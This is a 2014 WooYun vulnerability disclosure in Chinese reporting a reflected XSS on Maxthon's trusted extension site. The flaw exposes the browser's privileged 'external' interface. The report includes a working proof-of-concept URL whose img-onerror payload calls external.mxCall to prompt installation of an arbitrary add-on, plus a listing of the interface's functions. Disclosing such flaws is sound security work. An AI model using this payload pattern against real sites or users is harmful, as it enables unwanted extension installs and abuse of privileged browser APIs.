[公开漏洞]傲游4.3.0.300提示安装任意插件暴露external接口

来源：WooYun　浏览：1108次　时间：2014-05-28

傲游4.3.0.300提示安装任意插件暴露external接口相关厂商：傲游漏洞作者：blast 提交时间：2014-02-27 11:52 公开时间：2014-05-28 11:53 漏洞类型：权限提升危害等级：低自评Rank：5 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签：无漏洞详情披露状态：

2014-02-27：细节已通知厂商并且等待厂商处理中
2014-02-27：厂商已经确认，细节仅向厂商公开
2014-03-02：细节向第三方安全合作伙伴开放
2014-03-09：细节向核心白帽子及相关领域专家公开
2014-03-19：细节向普通白帽子公开
2014-04-08：细节向实习白帽子公开
2014-05-28：细节向公众公开

简要描述：

可信域maxthon.cn下存在xss暴露external接口，遨游浏览器自身未开启任何过滤，可以提示安装任意插件，可调用external下任意函数

详细说明：

http://extension.maxthon.cn/all/index.php?keyword=%22/%3E%3Cimg%20src=x%20onerror=%22external.mxCall%28%27InstallApp%27,%20%27http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon%27%29;%22/%3E

打开后提示安装http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon插件

漏洞证明：

external

Object {AddSearchProvider: function, IsSearchProviderInstalled: function, AddFavorite: function, addFavorite: function, searchText: function…}

AddFavorite: function (url, title) {

AddSearchProvider: function (name) {

GetPN: function () {

IsSearchProviderInstalled: function (name) {

addFavorite: function (url, title) {

max_version: (...)

get max_version: function () {

menuArguments: (...)

get menuArguments: function () {

mxCall: function (command, url) {

mxGetRuntime: function () {

mxProductName: (...)

get mxProductName: function () {

mxProductType: (...)

get mxProductType: function () {

mxVersion: (...)

get mxVersion: function () {

searchText: function (text, useMultiSearch) {

__proto__: Object



var e=external.searchText("3","3");